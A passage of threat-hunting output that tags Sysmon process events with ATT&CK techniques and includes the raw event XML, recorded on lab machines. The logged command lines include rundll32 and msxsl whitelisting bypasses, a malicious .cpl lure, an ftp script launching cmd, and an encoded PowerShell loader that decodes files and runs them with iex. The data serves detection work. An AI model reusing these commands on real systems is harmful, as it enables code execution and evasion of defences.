<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">105.73.6.105</Data>
<Data Name=""DestinationHostname"">aka105.inwitelecom.net</Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T17:26:09.437896Z"">
</TimeCreated>
<EventRecordID>1019</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 17:26:09.417</Data>
<Data Name=""ProcessGuid"">365ABB72-D7B1-5CE6-0000-00102CD76D00</Data>
<Data Name=""ProcessId"">2240</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">D:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D7B0-5CE6-0000-001077C56D00</Data>
<Data Name=""ParentProcessId"">3388</Data>
<Data Name=""ParentImage"">\\vboxsrv\HTools\msxsl.exe</Data>
<Data Name=""ParentCommandLine"">msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
</TimeCreated>
<EventRecordID>16392</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
<Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
<Data Name=""ProcessId"">1416</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
</TimeCreated>
<EventRecordID>16392</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
<Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
<Data Name=""ProcessId"">1416</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
</TimeCreated>
<EventRecordID>16392</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
<Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
<Data Name=""ProcessId"">1416</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:20:49.443464Z"">
</TimeCreated>
<EventRecordID>16513</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:20:49.261</Data>
<Data Name=""ProcessGuid"">365ABB72-55F1-5CD8-0000-0010781C3300</Data>
<Data Name=""ProcessId"">2392</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-55F1-5CD8-0000-00108A153300</Data>
<Data Name=""ParentProcessId"">3668</Data>
<Data Name=""ParentImage"">C:\Windows\System32\ftp.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\ftp.exe&quot; -s:c:\users\ieuser\appdata\local\temp\ftp.txt</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.063277Z"">
</TimeCreated>
<EventRecordID>5946</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.023</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010A6B1FF00</Data>
<Data Name=""ProcessId"">1508</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
</TimeCreated>
<EventRecordID>4864</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ProcessId"">4884</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ParentProcessId"">4356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
</TimeCreated>
<EventRecordID>4864</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ProcessId"">4884</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ParentProcessId"">4356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
</TimeCreated>
<EventRecordID>4864</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ProcessId"">4884</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
